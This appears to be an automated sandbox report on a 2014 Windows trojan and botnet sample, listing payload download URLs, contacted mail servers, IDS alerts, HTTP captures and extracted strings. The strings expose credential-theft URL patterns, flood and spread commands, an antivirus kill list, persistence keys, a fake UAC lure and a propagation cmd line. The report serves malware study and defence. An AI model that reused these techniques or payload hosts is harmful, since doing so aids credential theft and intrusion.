Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://54.191.185.232/bet.exe
hxxp://ec2-54-191-185-232.us-west-2.compute.amazonaws.com/ng.exe
hxxp://ec2-54-191-185-232.us-west-2.compute.amazonaws.com/bnew.exe
hxxp://54.191.185.232/bnew.exe
hxxp://54.191.185.232/ng.exe
mx1.comcast.net 68.87.26.147
mail22.msgafrica.com 208.83.212.15
gmail-smtp-in.l.google.com 173.194.76.27
mx1.hotmail.com 65.54.188.110
mx.insight.synacor.com 208.47.185.21
mail.hfwjwww10proxiesss.com 91.194.254.34
mx4.comcast.com 69.241.43.118
mx0b-00176a02.pphosted.com 67.231.157.41
mta6.am0.yahoodns.net 98.138.112.34
messaging.gou.go.ug 154.72.192.37
rush.edu.s8a1.psmtp.com 64.18.7.10
mx1.comcast.com 76.96.32.247
chempoint-com.mail.protection.outlook.com


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY HTTP traffic on port 443 (POST)
ET POLICY HTTP Request on Unusual Port Possibly Hostile
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

Traffic

GET /bnew.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 54.191.185.232
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Tue, 19 Aug 2014 08:17:59 GMT
Server: Apache/2.2.27 (Amazon)
Last-Modified: Mon, 18 Aug 2014 19:01:23 GMT
ETag: "41c59-20c00-500ebff40049a"
Accept-Ranges: bytes
Content-Length: 134144
Connection: close
Content-Type: application/octet-stream
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.........z3...`...`
...`=.I`...`...`...`...`...`...`...`...`...`...``..`...`...`...`...`..
.`...`Rich...`................PE..L... L.S.....................f......
[email protected]............................
......................d.... .../......................................
....................([email protected]
ext............................... ..`.rdata...&.......(..............
....@[email protected][email protected]..../... ...0....
..............@..@....................................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U......E.Q....E.c....E.L..
..E.F....E......E..0.A..M.3M..M..E...]................U...tV...C>..
.E.>....E.K....E._.........3....E...........y...................y..
.................z...................z...................z............
.......{...................{...................{......................
......................................................................
......................................................................
..................................................... .........$..
<<< skipped >>>


GET /bet.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 54.191.185.232
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Tue, 19 Aug 2014 08:17:26 GMT
Server: Apache/2.2.27 (Amazon)
Last-Modified: Mon, 18 Aug 2014 19:01:21 GMT
ETag: "41c45-44a00-500ebff1ee01a"
Accept-Ranges: bytes
Content-Length: 281088
Connection: close
Content-Type: application/octet-stream
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.........z3.q.`.q.`
.q.`=~I`.q.`...`.q.`...`.q.`...`.q.`...`.q.`.q.`eq.`.#.`.q.`.#.`.q.`.#
.`.q.`Rich.q.`........PE..L....J.S.............................S......
......@...............................................................
..............d.... ..<m...........................................
............... ...@...............<............................tex
t...q........................... ..`.rdata..X&.......(................
..@[email protected][email protected]...<m... ...n...
...............@..@...................................................
......................................................................
......................................................................
......................................................................
......................................................................
.....................................................U......E.Q....E.c
....E.L....E.F....E......E..0.A..M.3M..M..E...]................U...tV.
..C>...E.>....E.K....E._.........3....E...........y.............
......y...................z...................z...................z...
................{...................{...................{.............
......................................................................
......................................................................
.............................................................. ...
<<< skipped >>>


GET /ng.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 54.191.185.232
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Tue, 19 Aug 2014 08:17:42 GMT
Server: Apache/2.2.27 (Amazon)
Last-Modified: Mon, 18 Aug 2014 19:01:18 GMT
ETag: "41c43-31a00-500ebfef7ef36"
Accept-Ranges: bytes
Content-Length: 203264
Connection: close
Content-Type: application/octet-stream
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.........z3...`...`
...`=.I`...`...`...`...`...`...`...`...`...`...``..`...`...`...`...`..
.`...`Rich...`................PE..L...HJ.S.....................t......
.S............@..........................`............................
......................d.... ...=......................................
....................([email protected]
ext............................... ..`.rdata...&.......(..............
....@[email protected][email protected]....=... ...>.
.................@..@.................................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U......E.Q....E.c....E.
L....E.F....E......E..0.A..M.3M..M..E...]................U...tV...C>
;...E.>....E.K....E._.........3....E...........y...................
y...................z...................z...................z.........
..........{...................{...................{...................
......................................................................
......................................................................
........................................................ .........
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

kusadtylds.exe_112:

.text
`.rdata
@.data
;.tej
()<>@,;:\"[]
mail.hfwjwww10proxiesss.com
%c%c==
%c%c%c=
%c%c%c%c
%d.%d.%d.%d
,.!?-;()[]<>
%s %s%0.2d00
%s  0000
%s%0.2d00
(qmail %u by uid %u)
%sd%s.%u.qmail@%s
----=_NextPart_d_X_.8lX..8lX
x.8lx$.8lx$x@%s
0.0.0.0
%s %s
MAIL FROM: <%s>
RCPT TO: <%s>
to.hex
from.domain
msgid_host
date.imp
date.custom.utc
date.custom_gmt
date.custom
date.utc
qmail_msgid
ol_msgid
hotmail.com; yahoo.com; aol.com; gmail.com; mail.com
v=%s&i=%s&d=%d&m=%d&w=%d
&t=%d
&e=%d
%d:%d;
%d:%d:%s;
hXXp://%s:%d/%s.asp
%s=%s
hotmail.com
yahoo.com
SOFTWARE\Microsoft\Windows\CurrentVersion\
kernel32.dll
Software\Microsoft\Windows\CurrentVersion\Run
{CBCDE2F2-CB31-FF5A-6FA1-731547ACF810}
WS2_32.dll
HttpQueryInfoA
InternetCrackUrlA
HttpOpenRequestA
HttpSendRequestA
WININET.dll
KERNEL32.dll
RegOpenKeyExA
RegOpenKeyA
RegCloseKey
ADVAPI32.dll
MSVCRT.dll
_acmdln
DNSAPI.dll

kusadtylds.exe_112_rwx_00400000_0000B000:

.text
`.rdata
@.data
;.tej
()<>@,;:\"[]
mail.hfwjwww10proxiesss.com
%c%c==
%c%c%c=
%c%c%c%c
%d.%d.%d.%d
,.!?-;()[]<>
%s %s%0.2d00
%s  0000
%s%0.2d00
(qmail %u by uid %u)
%sd%s.%u.qmail@%s
----=_NextPart_d_X_.8lX..8lX
x.8lx$.8lx$x@%s
0.0.0.0
%s %s
MAIL FROM: <%s>
RCPT TO: <%s>
to.hex
from.domain
msgid_host
date.imp
date.custom.utc
date.custom_gmt
date.custom
date.utc
qmail_msgid
ol_msgid
hotmail.com; yahoo.com; aol.com; gmail.com; mail.com
v=%s&i=%s&d=%d&m=%d&w=%d
&t=%d
&e=%d
%d:%d;
%d:%d:%s;
hXXp://%s:%d/%s.asp
%s=%s
hotmail.com
yahoo.com
SOFTWARE\Microsoft\Windows\CurrentVersion\
kernel32.dll
Software\Microsoft\Windows\CurrentVersion\Run
{CBCDE2F2-CB31-FF5A-6FA1-731547ACF810}
WS2_32.dll
HttpQueryInfoA
InternetCrackUrlA
HttpOpenRequestA
HttpSendRequestA
WININET.dll
KERNEL32.dll
RegOpenKeyExA
RegOpenKeyA
RegCloseKey
ADVAPI32.dll
MSVCRT.dll
_acmdln
DNSAPI.dll

kusadtylds.exe_112_rwx_00FB0000_00027000:

.text
`.rdata
@.data
.rsrc
@.reloc
PSSSSSSh
PSSVSSh
RPVSSh
PSSh(
PSSh#
PSSh'
PSSh&
PSSh*
9p.uV

kusadtylds.exe_112_rwx_00FD8000_0006B000:

Opera/9.00 (Windows NT 5.1; U; en)
Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mozilla/4.0 (compatible; MSIE 6.01; Windows NT 6.0)
Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2)
Opera 9.4 (Windows NT 6.1; U; en)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; NeosBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0; .NET CLR 1.1.4322; Windows-Media-Player/10.00.00.3990; InfoPath.2
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.13) Gecko/20060410 Firefox/1.0.8
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)
Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; WOW64; .NET CLR 2.0.50726)
SbieDll.dll
Software\Classes\CLSID\%s\X
Software\Classes\CLSID\%s\X\%s
0xX
SB:0xX
G:%s_0xX_%c:%s_v1$
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u
IEXPLORE.EXE
IE.HTTP
SOFTWARE\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
IE.HTTPS
SOFTWARE\Microsoft\Windows\Shell\Associations\UrlAssociations\https\UserChoice
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.htm\UserChoice
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html\UserChoice
IE.AssocFile.HTM
HTTP\shell\open\command
Software\Microsoft\Windows\CurrentVersion\Ext\Settings\%s
Psapi.dll
%s\%s
Software\Adobe\Acrobat Reader\%s\Privileged
mscoree.dll
HARDWARE\DESCRIPTION\System\CentralProcessor\%u
SOFTWARE\Microsoft\Windows NT\CurrentVersion
nspr4.dll
nss3.dll
Urlmon.dll
URLDownloadToFileW
Netapi32.dll
76487-640-1457236-23837
76487-337-8429955-22614
76487-644-3177037-23510
76497-640-6308873-23835
55274-640-2673064-23950
76487-640-8834005-23195
76487-640-0716662-23535
76487-644-8648466-23106
00426-293-8170032-85146
76487-341-5883812-22420
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsBackup
{8E5E2654-AD2D-48BF-AC2D-D17F00898D06}
snxhk.dll
comctl32.dll
ZwSetValueKey
ZwDeleteValueKey
SOFTWARE\%s
update.microsoft.com
microsoft.com
windowsupdate.microsoft.com
JOIN
PRIVMSG
.rdata
cmd_option.%s
/c %s
cmd.exe
msvcrt.dll
--x-x-x-xx
Content-Type: multipart/form-data; boundary=x-x-x-xx
Content-Disposition: multipart/form-data; name="newfile"; filename="%d.jpeg"
%s?action=up&g=%s
xul.dll
<Port>
<Pass>
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
?pid=%d
?page=%d
?id=%u
%s=%u&%s=%s
%s=%s&%s=%u
&%s=%s
&%s%u=
&%s%hu=
&%s=_%u
%d|%s|%s|%s
.info
httpget
GET /%s HTTP/1.1
Host: %s
Content-Length: %d
Accept: %s
Accept-Language: %s
Accept-Charset: %s
Accept-Encoding: %s
User-Agent: %s
Referer: %s
Connection: %s
hXXp://
iexplore.exe
firefox.exe
tbb-firefox.exe
%s:%hu
windowsupdate
SSH2_MSG_KEXINIT
SSH2_MSG_DISCONNECT
SSH2_MSG_USERAUTH_SUCCESS
hXXp://%s%s/image.php?id=%s
TaskDialogIndirect
hXXp://answers.microsoft.com/en-us/windows/forum/windows_vista-windows_programs/corrupted-documents-folder/e2a7660f-8eea-4f27-b2e6-e77a0f0c1535
ÐxX
ntdll.dll
kernel32.dll
secur32.dll
crypt32.dll
user32.dll
advapi32.dll
wininet.dll
shell32.dll
shlwapi.dll
ole32.dll
version.dll
sfc.dll
dnsapi.dll
ws2_32.dll
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity>
8"808]9|9
9%9 919<9
=(=/=6==={=
4 4?4^4}4
6o6g6r6w6
9 9$9(90949
.text
`.rdata
@.data
.rsrc
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
Invalid parameter passed to C runtime function.
GetProcessWindowStation
USER32.DLL
RegSetKeySecurity
RegEnumKeyA
ADVAPI32.dll
GDI32.dll
GetNamedPipeHandleStateA
CreateIoCompletionPort
DisconnectNamedPipe
GetNamedPipeInfo
PeekNamedPipe
GetProcessHeap
SetProcessShutdownParameters
GetCPInfo
KERNEL32.dll
.EGDF
-TQ}9J3
l.Bt.,
Y%U(q
>.Rm4xon}V^
jdB .toN@&
#)CM%D
qu.kP
{-Qn}-
 %Fj 7
o!L.Zy
.mvry
Ryx.ps
n}.cK
{ww%f
%c;sk
h%S4m
.FdT=
Software\Classes\CLSID\%S
G:%S_0xX
chrome.exe
opera.exe
safari.exe
maxthon.exe
:Mozilla\Firefox\Profiles
cookies.sqlite
%s\winsxs\x86_microsoft.windows.common-controls_*6.0.*_*
%s\winsxs\%s\comctl32.dll
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\%s
%s:*:Enabled
avcuf32.dll
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
prstrui.exe
Windows Defender
MpClient.dll
Windows Defender\MSASCui.exe
MpSvc.dll
msseces.exe
MsMpEng.exe
MSASCui.exe
MpAsDesc.dll
MsMpLics.dll
avgui.exe
avgidsagent.exe
avgwdsvc.exe
avgdiagex.exe
avgmfapx.exe
avgupd.exe
avgcfgex.exe
avgnt.exe
avguard.exe
avshadow.exe
avcenter.exe
update.dll
updaterc.dll
usrreq.exe
ccsvchst.exe
symerr.exe
NIS.exe
NAV.exe
navw32.exe
avastui.exe
AvastEmUpdate.exe
ashUpd.exe
WRSA.exe
zatray.exe
ForceField.exe
updating.dll
fshoster32.exe
fsaua.dll
PSUNMain.exe
PSUAService.exe
PSANHost.exe
PSUNScan.dll
epavjobs.exe
AVENGINE.exe
Upgrader.exe
adaware.exe
BullGuard.exe.manifest
BullGuardUpdate.exe
BullGuard.exe
BullGuardScanner.exe
BullGuardBhvScanner.exe
BullGuardUpdate2.exe
BgScan.exe
BgScanEngine.dll
.manifest
updater.exe
Backup\RSD\RSSetup\updater.exe
RsTray.exe
RavMonD.exe
RsMgrSvc.exe
rsmain.exe
RsScan.dll
RsTray.dll
mbamgui.exe
mbam.exe
pctsGui.exe
pctsAuxs.exe
pctsSvc.exe
Update.exe
UpdateHlpr.dll
Definitions\vcore.dll
sbamui.exe
SBAMTray.exe
updater_client_mod.dll
FProtTray.exe
FPWin.exe
scf.dat
ALUpdate.exe
update_tmp.exe
arcaclean.exe
BavUpdater.exe
rcfp.exe
CLPSLA.exe
op_mon.exe
niu.exe
K7TSUpdT.exe
sguardxup.exe
ccupdate.exe
caupdate.dll
a2guard.exe
a2start.exe
a2service.exe
AVKTray.exe
GDSC.exe
AVK.exe
GDFirewallTray.exe
Bka.exe
BLuPro.exe
BkavSystemServer.exe
BkavService.exe
LiveUpdate.dll
LiveConnect.dll
BaseFile\Bkav\LiveUpdate.dll
V3Lite.exe
ASDSvc.exe
autoup.exe
downloader.exe
%s.config
updatesrv.exe
updatemgr.dll
egui.exe
ekrn.exe
x86\ekrn.exe
uWinMgr.exe
coreServiceShell.exe
uiSeAgnt.exe
uiWatchDog.exe
plugins\plugUpdater.dll
UiFrmwrk\uiUpdateTray.exe
coreFrameworkHost.exe
mcagent.exe
McSvHost.exe
McUICnt.exe
McPvTray.exe
mcui_exe
mcpltui_exe
mcshell.exe
mcupdmgr.exe
mcupdate.exe
mcshield.exe
mcupdui.dll
McAPExe.exe
.config
Image File Execution Options\%s
SYSTEM\CurrentControlSet\services\%s
%c:\ntusbdriver.sys
%c:\*p.exe
%c:\%s
p.exe
%WinDir%\explorer.exe
/C start /d. %s&"%s"
%COMSPEC%
%WinDir%\system32\shell32.dll
%c:\%s.lnk
VisthAux.exe
explorer.exe
t.minecraft
Works! PID: %d, Name: %s
cmdvirth
%s%s\X
tcp://
svchost.exe
csrss.exe
lsass.exe
smss.exe
wscript.exe
cscript.exe
vbc.exe
rundll32.exe
regsvr32.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
winlogon.exe
services.exe
%s\x.lnk
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\%s
desktop.ini
SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows
wintrust.dll
chrome.dll
Applications\iexplore.exe\shell\open\command
%s_xx
x.zip
Navw32.exe
SysInspector.exe
avscan.exe
mfefire.exe
wuauclt.exe
WerFault.exe
lFileZilla\sitemanager.xml
port
Sites.dat
Quick.dat
%s\3\%s
%s\4\%s
spoolsv.exe
steam.exe
skype.exe
origin.exe
dwm.exe
tapi3.dll
/C copy "%s" "%s"
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
Windows Update Service
"%s" /%s
Software\Microsoft\Windows\CurrentVersion\RunOnce
/CREATE /SC ONLOGON /TN "Windows Update Check - 0xX" /TR "%s" /RL HIGHEST
schtasks.exe
/DELETE /TN "Windows Update Check - 0xX" /F
\Windows\Explorer.exe
Low_X
%s.manifest
PendingFileRenameOperations
%s\X
Windows\CurrentVersion\Run
CurrentVersion\Windows
Windows NT\CurrentVersion\Image File Execution Options\%s
Windows has encountered a corrupted folder on your hard drive
Multiple corrupted files have been found in the folder 'My Documents'. To prevent serious loss of data, please allow Windows to restore these files.
Corrupted folder: %s
Corrupted file count: %d
<a href=".ms">%s</a>
/c start "" "%s" /%s "%s"
shell32,ShellExec_RunDLL "%s" /%s "%s"
You denied the proper privileges to the Windows file restoration utility. Please select YES on the following UAC prompt to allow Windows to restore the corrupted files.
Windows 3.1 Update Service
%s:Zone.Identifier
%s\X.pif
KERNEL32.DLL
KERNELBASE.DLL
ekernel32.dll
kernelbase.dll
Website Copier [Offline Browser]
WinHTTrack Website Copier, Copy Websites to Your Computer
3.47.21
WinHTTrack.exe
WinHTTrack Website Copier

svchost.exe_1528:

.text
`.data
.rsrc
ADVAPI32.dll
KERNEL32.dll
NTDLL.DLL
RPCRT4.dll
NETAPI32.dll
ole32.dll
ntdll.dll
RegCloseKey
RegOpenKeyExW
GetProcessHeap
NtOpenKey
svchost.pdb
\PIPE\
Software\Microsoft\Windows NT\CurrentVersion\Svchost
\Registry\Machine\System\CurrentControlSet\Control\SecurePipeServers\
5.1.2600.5512 (xpsp.080413-2111)
svchost.exe
Windows
Operating System
5.1.2600.5512

kusadtylds.exe_112_rwx_058D0000_0004E000:

.text
`.rdata
@.data
.reloc
=MSG t
>MSG u`
=PASS
8httpu1
8httpuM
tlSSSSSSSSSShL0
%s.%s
%s.%S
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
i.root-servers.org
%s.Blocked "%s" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.p10-> Message hijacked!
%s.p10-> Message to %s hijacked!
%s.p21-> Message hijacked!
msnmsg
CAL %d %6s
ngr->blocksize: %d
block_size: %d
\\.\pipe\%s
kernel32.dll
%s_%d
-%sMutex
ntdll.dll
%s-pid
%s-comm
JOIN #
PRIVMSG #
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
PRIVMSG %5s
JOIN %5s
PRIVMSG
JOIN
%s:%d
%s.%s%s
%S%s%s
%s.%S%S
%S%S%S
state_%s
%s.%s (p='%S')
pop3://%s:%s@%s:%d
%s:%s@%s:%d
PTF://%s:%s@%s:%d
ftpgrab
%s.%s ->> %s (%s : %s)
%s.%s ->> %s : %s
%s-%s-%s
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%S'
webroot.
virusbuster.nprotect.
heck.tc
onecare.live.
login[password]
login[username]
*members*.iknowthatgirl*/members*
*youporn.*/login*
*members.brazzers.com*
*bcointernacional*login*
*:2222/CMD_LOGIN*
*whcms*dologin*
*:2086/login*
*:2083/login*
*:2082/login*
*webnames.ru/*user_login*
Webnames
*dotster.com/*login*
loginid
*enom.com/login*
login.Pass
login.User
*login.Pass=*
*1and1.com/xml/config*
*moniker.com/*Login*
LoginPassword
LoginUserName
*LoginPassword=*
*namecheap.com/*login*
loginname
*godaddy.com/login*
Password
*Password=*
*alertpay.com/login*
*netflix.com/*ogin*
*thepiratebay.org/login*
*torrentleech.org/*login*
*vip-file.com/*/signin-do*
*sms4file.com/*/signin-do*
*letitbit.net*
*what.cd/login*
*oron.com/login*
*filesonic.com/*login*
*speedyshare.com/login*
*uploaded.to/*login*
*uploading.com/*login*
loginUserPassword
loginUserName
*loginUserPassword=*
*fileserv.com/login*
*hotfile.com/login*
*4shared.com/login*
txtpass
*txtpass=*
*netload.in/index*
*freakshare.com/login*
login_pass
*login_pass=*
*mediafire.com/*login*
*sendspace.com/login*
*megaupload.*/*login*
*depositfiles.*/*/login*
*signin.ebay*SignIn
*officebanking.cl/*login.asp*
*secure.logmein.*/*logincheck*
session[password]
*password]=*
*twitter.com/sessions
txtPassword
*&txtPassword=*
*.moneybookers.*/*login.pl
*runescape*/*weblogin*
*&password=*
*no-ip*/login*
*steampowered*/login*
quick_password
*hackforums.*/member.php
*facebook.*/login.php*
*login.yahoo.*/*login*
passwd
login
*passwd=*
*login.live.*/*post.srf*
TextfieldPassword
*TextfieldPassword=*
*gmx.*/*FormLogin*
*Passwd=*
FLN-Password
*FLN-Password=*
*pass=*
*bigstring.*/*index.php*
*screenname.aol.*/login.psp*
password
loginId
*password=*
*aol.*/*login.psp*
Passwd
*google.*/*ServiceLoginAuth*
login_password
login_email
*login_password=*
*paypal.*/webscr?cmd=_login-submit*
%s / ?%d HTTP/1.1
Host: %s
User-Agent: %s
Mozilla/4.0
\\.\PHYSICALDRIVE0
shell32.dll
httpi
dnsapi.dll
hXXp://%s/%s
hXXp://%s/
POST /23s
[%s{%s%s{%s
n%s[%s{%s%s{%s
%s[%s{%s
[DNS]: Redirecting "%s" to "%s"
%s|%s
[Logins]: Cleared %d logins
FTP ->
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
hXXp://
[Login]: %s
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[Speed]: Estimated upload speed %d KB/s
Software\Microsoft\Windows\CurrentVersion\Run
\\.\%c:
*bebo.*/c/profile/comment_post.json
*bebo.*/mail/MailCompose.jsp*
*friendster.*/sendmessage.php*
*friendster.*/rpc.php
*vkontakte.ru/mail.php
*vkontakte.ru/wall.php
*vkontakte.ru/api.php
*facebook.*/ajax/*MessageComposerEndpoint.php*
msg_text
*facebook.*/ajax/chat/send.php*
-_.!~*'()
%s.%s hijacked!
MSG %d %s %d
MSG %d %1s
SDG %d %d
Content-Length: %d
SDG %d
%s_0xX
RegCreateKeyExW
RegCreateKeyExA
URLDownloadToFileW
URLDownloadToFileA
HttpSendRequestW
HttpSendRequestA
NtEnumerateValueKey
DNSAPI.dll
Secur32.dll
ShellExecuteA
SHELL32.dll
HttpQueryInfoA
InternetOpenUrlA
HttpQueryInfoW
WININET.dll
SHLWAPI.dll
WS2_32.dll
MSVCRT.dll
GetProcessHeap
ConnectNamedPipe
CreateNamedPipeA
DisconnectNamedPipe
GetWindowsDirectoryW
GetWindowsDirectoryA
KERNEL32.dll
USER32.dll
RegCloseKey
RegNotifyChangeKeyValue
RegOpenKeyExA
ADVAPI32.dll
ole32.dll
m1xg.org
mxxtxxt.biz
meob.me
]1.1.0.0
msn.set
msn.int
http.set
http.int
http.inj
logins
PASS %s
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
SSRR %s 0 0 :%s
KCIK %s
SEND %s %s
PART %s
PPPPMSG %s :%s
QUIT :%s
PPNG %s
PPPPMSG
[v="%s" c="%s" h="%s" p="%S"]
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Finished flood on "%s"
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Finished flood on "%s:%d"
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Finished flood on "%s:%d"
[USB]: Infected %s
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread interval to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Injected value is now %s.
[HTTP]: Updated HTTP spread interval to "%s"
[Visit]: Visited "%s"
[DNS]: Blocked "%s"
[usb="%d" msn="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[RSOCK4]: Started rsock4 on "%s:%d"
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[Visit]: Error visitng "%s"
[FTP Login]: %s
[POP3 Login]: %s
[FTP Infect]: %s was iframed
[HTTP Login]: %s
[HTTP Traffic]: %s
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected Reg: "%s"
[PDef ]: %s
[DNS]: Blocked DNS "%s"
[MSN]: %s
[HTTP]: %s
ftplog
ftpinfect
httplogin
httptraff
httpspread
hXXp://api.wipmania.com/
\\.\pipe\x_ipc
\\.\pipe\c1419a97
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\kusadtylds.exe
%WinDir%
%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe
7 767<7~7
8*808;8~8
%s\Identities\%s.exe
\\.\pipe
autorun.inf
pidgin.exe
wlcomm.exe
msnmsgr.exe
msmsgs.exe
flock.exe
opera.exe
chrome.exe
ieuser.exe
iexplore.exe
firefox.exe
.ipconfig.exe
verclsid.exe
regedit.exe
rundll32.exe
cmd.exe
regsvr32.exe
l"%s" %S
lol.exe
n127.0.0.1
%s:Zone.Identifier
wininet.dll
secur32.dll
ws2_32.dll
:%S%S\
winlogon.exe
notepad.exe
Aadvapi32.dll
urlmon.dll
nspr4.dll
Akernel23.dll
y%s\%s.exe
lsass.exe
Software\Microsoft\Windows\CurrentVersion\Policies\System
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
\Device\HarddiskVolume1\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\kusadtylds.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ksaduytr.exe

svchost.exe_1528_rwx_00090000_00029000:

.text
`.data
.rsrc
@.reloc
*windows defender*
*windowsupdate*
*drweb*
dwwin.exe
kernel32.dll
iphlpapi.dll
GetExtendedTcpTable
GetOwnerModuleFromTcpEntry
%systemroot%
%programfiles%\Common Files\*\*.exe
%appdata%\Identities\*.exe
%root%\RECYCLER\S-1-5-21-0243556031-888888379-*\*.exe
ole32.dll
/c "%%SystemRoot%%\explorer.exe %Í%%%s & attrib -s -h %Í%%%s & xcopy /F /S /Q /H /R /Y %Í%%%s %%temp%%\%s\ & attrib  s  h %Í%%%s & start %%temp%%\%s\%s & exit"
/c "start %Í%%%s & attrib -s -h %Í%%%s & xcopy /F /S /Q /H /R /Y %Í%%%s %%temp%%\%s\ & attrib  s  h %Í%%%s & start %%temp%%\%s\%s & exit"
%ALLUSERSPROFILE%\..\..\windows\system32\cmd.exe
%SystemRoot%\system32\SHELL32.dll
%s\c731200
%s\%s
%s\%s.lnk
Windows_Shared_Mutex_231_c000100
ntdll.dll
\ScreenSaverPro.scr
\temp.bin
user32.dll
advapi32.dll
shell32.dll
urlmon.dll
wininet.dll
gdi32.dll
rpcrt4.dll
netapi32.dll
*.exe
.gonewiththewings
*.gonewiththewings
WinExec
URLDownloadToFileA
hXXp://VVV.google.com
\calc.exe
\Reader_sl.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
notepad.exe
\notepad.exe
\svchost.exe
WindowsId
Identities\%s
%s\%s\%s.exe
:Zone.Identifier
.quarantined
"%s" -shell
"%s" -bind
userinit.exe
explorer.exe
Windows critical error, require reboot
Windows Update
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
GetProcessHeap
GetWindowsDirectoryA
KERNEL32.dll
USER32.dll
RegCloseKey
RegOpenKeyA
RegEnumKeyA
RegCreateKeyExA
RegOpenKeyExA
ADVAPI32.dll
ShellExecuteExW
SHELL32.dll
SetTcpEntry
SHLWAPI.dll
RPCRT4.dll
NETAPI32.dll
DNSAPI.dll
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
Software\WindowsId Manager Reader
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Software\Microsoft\Windows\CurrentVersion\Run
